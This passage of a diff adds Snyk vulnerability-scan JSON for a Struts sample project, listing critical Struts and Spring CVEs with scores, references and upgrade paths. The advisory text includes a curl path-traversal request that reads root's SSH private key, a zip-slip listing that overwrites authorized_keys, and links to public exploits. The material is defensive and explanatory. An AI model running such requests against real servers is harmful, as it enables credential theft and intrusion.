"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:49.896841Z" + } + ], + "description": "## 
Overview\r\n[`org.apache.struts:struts2-core`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22struts2-core%22)\r\nApache Struts 2.3.20.x before 2.3.20.3, 2.3.24.x before 2.3.24.3, and 2.3.28.x before 2.3.28.1, when Dynamic Method Invocation is enabled, allow remote attackers to execute arbitrary code via vectors related to an ! (exclamation mark) operator to the REST Plugin.\r\n\r\n## References\r\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3087)", + "epssDetails": { + "percentile": "0.97435", + "probability": "0.46493", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-3087" + ], + "CWE": [ + "CWE-20" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2017-02-22T07:28:23.339000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2016-06-02T00:40:36Z", + "exploitDetails": { + "sources": [ + "ExploitDB", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2016-06-02T00:40:36Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:12.756827Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.20.3" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20", + "filtered": { + "ignored": [ + { + "reason": "test", + "created": "2024-07-25T12:48:38.078Z", + "expires": "2024-08-08T12:48:37.849Z", + "ignoredBy": { + "id": "d9b21e67-191b-45cf-9bc0-f82258937fc6", + "name": "austin.doll@snyk.io", + 
"email": "austin.doll@snyk.io" + }, + "reasonType": "not-vulnerable", + "disregardIfFixable": false, + "source": "api", + "path": [ + "*" + ] + } + ] + } + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-30778", + "title": "Directory Traversal", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Takeshi Terada" + ], + "semver": { + "vulnerable": [ + "[2.3.20,2.3.31)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.3.31" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "http://struts.apache.org/docs/s2-042.html", + "title": "Apache Security Advisory" + }, + { + "url": "https://github.com/apache/struts/commit/030ffa33543f8953306ed0c0dc815c7fb74d7129", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/8e67b9144aa643769b261e2492cb561e04d016ab", + "title": "GitHub Commit" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:03.921305Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:32.508677Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:47:03.921305Z" + } + ], + "description": "## Overview\n[`org.apache.struts:struts2-core`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22struts2-core%22)\nAffected versions of the package are vulnerable to Directory 
Traversal.\n\n## Details\nA Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with \"dot-dot-slash (../)\" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.\r\n\r\nDirectory Traversal vulnerabilities can be generally divided into two types:\r\n\r\n- **Information Disclosure**: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.\r\n\r\n`st` is a module for serving static files on web pages, and contains a [vulnerability of this type](https://snyk.io/vuln/npm:st:20140206). In our example, we will serve files from the `public` route.\r\n\r\nIf an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.\r\n\r\n```\r\ncurl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa\r\n```\r\n**Note** `%2e` is the URL encoded version of `.` (dot).\r\n\r\n- **Writing arbitrary files**: Allows the attacker to create or replace existing files. This type of vulnerability is also known as `Zip-Slip`. \r\n\r\nOne way to achieve this is by using a malicious `zip` archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.\r\n\r\nThe following is an example of a `zip` archive with one benign file and one malicious file. 
Extracting the malicious file will result in traversing out of the target folder, ending up in `/root/.ssh/` overwriting the `authorized_keys` file:\r\n\r\n```\r\n2018-04-15 22:04:29 ..... 19 19 good.txt\r\n2018-04-15 22:04:42 ..... 20 20 ../../../../../../root/.ssh/authorized_keys\r\n```\n\n\n## References\n- [Apache Security Advisory](http://struts.apache.org/docs/s2-042.html)\n", + "epssDetails": { + "percentile": "0.89019", + "probability": "0.02019", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-6795" + ], + "CWE": [ + "CWE-94" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2017-02-22T07:28:23.415000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2016-10-19T01:09:09.263000Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2016-10-19T01:09:09.263000Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:47:03.921305Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.31" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20", + "filtered": { + "ignored": [ + { + "reason": "test", + "created": "2024-07-25T12:49:14.737Z", + "expires": "2024-08-08T12:49:14.556Z", + "ignoredBy": { + "id": "d9b21e67-191b-45cf-9bc0-f82258937fc6", + "name": "austin.doll@snyk.io", + "email": "austin.doll@snyk.io" + }, + "reasonType": "not-vulnerable", + "disregardIfFixable": false, + 
"source": "api", + "path": [ + "*" + ] + } + ] + } + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-31503", + "title": "Arbitrary Code Execution", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F", + "credit": [ + "Lupin", + "David Greene", + "Roland McIntosh" + ], + "semver": { + "vulnerable": [ + "[,2.3.34)", + "[2.4,2.5.12)" + ] + }, + "exploit": "Functional", + "fixedIn": [ + "2.3.34", + "2.5.12" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://cwiki.apache.org/confluence/display/WW/S2-053", + "title": "Apache Security Bulletin" + }, + { + "url": "https://github.com/brianwrf/S2-053-CVE-2017-12611", + "title": "Exploit" + }, + { + "url": "https://github.com/apache/struts/commit/2306f5f7fad7f0157f216f34331238feb0539fa", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/637ad1c3707266c33daabb18d7754e795e6681f", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2017/CVE-2017-12611.yaml", + "title": "Nuclei Templates" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:46:50.788695Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:06:02.858095Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:50.788695Z" 
+ } + ], + "description": "## Overview\r\n[Apache Struts2](http://struts.apache.org/) is a popular open-source framework for developing web applications in the Java programming language.\r\n\r\nAffected versions of this package are vulnerable to arbitrary code execution. Using expression literals or forcing expressions in Freemarker tags (see example snippet below), and using request values can lead to remote code execution.\r\n\r\n```xml\r\n<@s.hidden name=\"redirectUri\" value=redirectUri />\r\n<@s.hidden name=\"redirectUri\" value=\"${redirectUri}\" />\r\n<@s.hidden name=\"${redirectUri}\"/>\r\n```\r\n\r\nIn both cases a writable property is used in the value attribute and in both cases this is treated as an expression by Freemarker. Please be aware that using Struts expression evaluation style is safe:\r\n\r\n```\r\n<@s.hidden name=\"redirectUri\" value=\"%{redirectUri}\" />\r\n<@s.hidden name=\"%{redirectUri}\"/>\r\n```\r\n\r\n## Remediation\r\nDevelopers are strongly advised to upgrade their _Apache Struts_ components to version `2.3.34`, `2.5.12` or higher.\r\n\r\n## References\r\n- [Apache Security Bulletin](https://cwiki.apache.org/confluence/display/WW/S2-053)", + "epssDetails": { + "percentile": "0.99858", + "probability": "0.97300", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2017-12611" + ], + "CWE": [ + "CWE-20", + "CWE-502" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2017-09-06T17:28:23.339000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2017-09-05T17:28:23Z", + "exploitDetails": { + "sources": [ + "Nuclei Templates", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Functional", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, 
+ "publicationTime": "2017-09-06T17:28:23Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:22.617066Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.34" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20", + "filtered": { + "ignored": [ + { + "reason": "test", + "created": "2024-07-25T12:48:49.330Z", + "expires": "2024-08-08T12:48:49.098Z", + "ignoredBy": { + "id": "d9b21e67-191b-45cf-9bc0-f82258937fc6", + "name": "austin.doll@snyk.io", + "email": "austin.doll@snyk.io" + }, + "reasonType": "not-vulnerable", + "disregardIfFixable": false, + "source": "api", + "path": [ + "*" + ] + } + ] + } + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-451610", + "title": "Improper Action Name Cleanup", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.0.0, 2.3.29)", + "[2.5, 2.5.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.3.29", + "2.5.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://github.com/apache/struts/commit/237432512df0e27013f7c7b9ab59fdce44ca34a5", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/27ca165ddbf81c84bafbd083b99a18d89cc49ca7", + "title": "GitHub Commit" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:46:52.582114Z" + } + ], + "cvssSources": [ + { + 
"type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:23.840033Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:52.582114Z" + } + ], + "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Improper Action Name Cleanup. It allowed attackers to have unspecified impact via vectors related to improper action name clean up.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.29, 2.5.1 or higher.\n## References\n- [GitHub Commit](https://github.com/apache/struts/commit/237432512df0e27013f7c7b9ab59fdce44ca34a5)\n- [GitHub Commit](https://github.com/apache/struts/commit/27ca165ddbf81c84bafbd083b99a18d89cc49ca7)\n", + "epssDetails": { + "percentile": "0.89903", + "probability": "0.02365", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-4436" + ], + "CWE": [ + "CWE-459" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2019-07-16T11:14:42.540198Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2016-09-19T05:25:51Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2016-09-19T05:25:51Z", + "severityBasedOn": "CVSS", 
+ "modificationTime": "2024-03-11T09:46:52.582114Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.29" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20", + "filtered": { + "ignored": [ + { + "reason": "test", + "created": "2024-07-25T12:49:12.566Z", + "expires": "2024-08-08T12:49:12.322Z", + "ignoredBy": { + "id": "d9b21e67-191b-45cf-9bc0-f82258937fc6", + "name": "austin.doll@snyk.io", + "email": "austin.doll@snyk.io" + }, + "reasonType": "not-vulnerable", + "disregardIfFixable": false, + "source": "api", + "path": [ + "*" + ] + } + ] + } + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-608097", + "title": "Remote Code Execution (RCE)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F/RL:O/RC:C", + "credit": [ + "Matthias Kaiser" + ], + "semver": { + "vulnerable": [ + "[2.0.0, 2.5.22)" + ] + }, + "exploit": "Functional", + "fixedIn": [ + "2.5.22" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://www.exploit-db.com/exploits/49068", + "title": "Exploit" + }, + { + "url": "https://github.com/PrinceFPF/CVE-2019-0230", + "title": "Proof Of Concept" + }, + { + "url": "https://cwiki.apache.org/confluence/display/WW/S2-059", + "title": "Security Bulletin" + }, + { + "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2019/CVE-2019-0230.yaml", + "title": "Nuclei Templates" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + 
"modificationTime": "2024-03-11T09:47:13.645371Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:03.579407Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F/RL:O/RC:C", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:00:34.752855Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:13.645371Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:03.579407Z" + } + ], + "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE). 
Forced double OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.5.22 or higher.\n## References\n- [Exploit](https://www.exploit-db.com/exploits/49068)\n- [Proof Of Concept](https://github.com/PrinceFPF/CVE-2019-0230)\n- [Security Bulletin](https://cwiki.apache.org/confluence/display/WW/S2-059)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2019/CVE-2019-0230.yaml)\n", + "epssDetails": { + "percentile": "0.99361", + "probability": "0.95346", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-0230" + ], + "CWE": [ + "CWE-94" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2020-08-21T14:31:35.397242Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2020-08-11T14:14:01Z", + "exploitDetails": { + "sources": [ + "ExploitDB", + "Nuclei Templates", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Functional", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2020-08-21T14:06:54Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:22.021057Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.5.22" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20", + "filtered": { + "ignored": [ + { + "reason": "test", + "created": "2024-07-25T12:48:52.394Z", + "expires": "2024-08-08T12:48:52.149Z", + 
"ignoredBy": { + "id": "d9b21e67-191b-45cf-9bc0-f82258937fc6", + "name": "austin.doll@snyk.io", + "email": "austin.doll@snyk.io" + }, + "reasonType": "not-vulnerable", + "disregardIfFixable": false, + "source": "api", + "path": [ + "*" + ] + } + ] + } + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-6102825", + "title": "Remote Code Execution (RCE)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", + "credit": [ + "Steven Seeley" + ], + "semver": { + "vulnerable": [ + "[,2.5.33)", + "[6.0.0,6.3.0.2)" + ] + }, + "exploit": "High", + "fixedIn": [ + "2.5.33", + "6.3.0.2" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://lists.apache.org/thread/yh09b3fkf6vz5d6jdgrlvmg60lfwtqhj", + "title": "Apache Mailing List" + }, + { + "url": "https://www.akamai.com/blog/security-research/apache-struts-cve-exploitation-attempts", + "title": "Exploitation Attempts" + }, + { + "url": "https://github.com/apache/struts/commit/162e29fee9136f4bfd9b2376da2cbf590f9ea163", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/d8c69691ef1d15e76a5f4fcf33039316da2340b6", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/wy876/POC/blob/main/Apache%20Struts2%20CVE-2023-50164.md", + "title": "PoC" + }, + { + "url": "https://cwiki.apache.org/confluence/display/WW/S2-066", + "title": "Struts Issue" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:54:10.322561Z" + }, + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": 
"2024-03-11T09:54:10.688470Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-07-23T07:46:17.121104Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:54:10.322561Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:54:10.688470Z" + } + ], + "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE) via manipulation of file upload parameters that enable path traversal. 
Under certain conditions, uploading of a malicious file is possible, which may then be executed on the server.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.5.33, 6.3.0.2 or higher.\n## References\n- [Apache Mailing List](https://lists.apache.org/thread/yh09b3fkf6vz5d6jdgrlvmg60lfwtqhj)\n- [Exploitation Attempts](https://www.akamai.com/blog/security-research/apache-struts-cve-exploitation-attempts)\n- [GitHub Commit](https://github.com/apache/struts/commit/162e29fee9136f4bfd9b2376da2cbf590f9ea163)\n- [GitHub Commit](https://github.com/apache/struts/commit/d8c69691ef1d15e76a5f4fcf33039316da2340b6)\n- [PoC](https://github.com/wy876/POC/blob/main/Apache%20Struts2%20CVE-2023-50164.md)\n- [Struts Issue](https://cwiki.apache.org/confluence/display/WW/S2-066)\n", + "epssDetails": { + "percentile": "0.94639", + "probability": "0.09044", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2023-50164" + ], + "CWE": [ + "CWE-94" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2023-12-07T11:44:29.902168Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2023-12-07T09:45:05Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2023-12-07T12:27:32.361011Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-07-23T07:46:17.121104Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.5.33" + ], + "isUpgradable": true, + "isPatchable": false, + 
"name": "org.apache.struts:struts2-core", + "version": "2.3.20", + "filtered": { + "ignored": [ + { + "reason": "test", + "created": "2024-07-25T12:48:43.321Z", + "expires": "2024-08-08T12:48:43.099Z", + "ignoredBy": { + "id": "d9b21e67-191b-45cf-9bc0-f82258937fc6", + "name": "austin.doll@snyk.io", + "email": "austin.doll@snyk.io" + }, + "reasonType": "not-vulnerable", + "disregardIfFixable": false, + "source": "api", + "path": [ + "*" + ] + } + ] + } + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2436751", + "title": "Remote Code Execution", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[ ,5.2.20)", + "[5.3.0, 5.3.18)" + ] + }, + "exploit": "High", + "fixedIn": [ + "5.2.20", + "5.3.18" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [ + { + "version": [ + "[ ,5.2.20)", + "[5.3.0, 5.3.18)" + ], + "functionId": { + "filePath": "org/springframework/beans/CachedIntrospectionResults.java", + "className": "CachedIntrospectionResults", + "functionName": "" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-beans", + "references": [ + { + "url": "https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html", + "title": "CyberKendra Post" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/002546b3e4b8d791ea6acccb81eb3168f51abb15", + "title": "GitHub Commit" + }, + { + "url": "https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/", + "title": "LunaSec Blog" + }, + { + "url": "https://blog.payara.fish/payara-and-spring4shell", + "title": "Payara Blogpost" + }, + { + "url": "https://github.com/CalumHutton/CVE-2022-22965-PoC_Payara", + "title": "Payara PoC" + }, + { + "url": "https://snyk.io/blog/spring4shell-zero-day-rce-spring-framework-explained/", + "title": "Snyk Blog - Technical Breakdown" 
+ }, + { + "url": "https://github.com/Kirill89/CVE-2022-22965-PoC", + "title": "Snyk PoC" + }, + { + "url": "https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement", + "title": "Spring Security Announcement" + }, + { + "url": "https://spring.io/blog/2022/04/01/spring-framework-rce-mitigation-alternative", + "title": "Spring Tomcat Mitigation Advice" + }, + { + "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", + "title": "CISA - Known Exploited Vulnerabilities" + }, + { + "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2022/CVE-2022-22965.yaml", + "title": "Nuclei Templates" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:48:12.628867Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:15.463472Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + 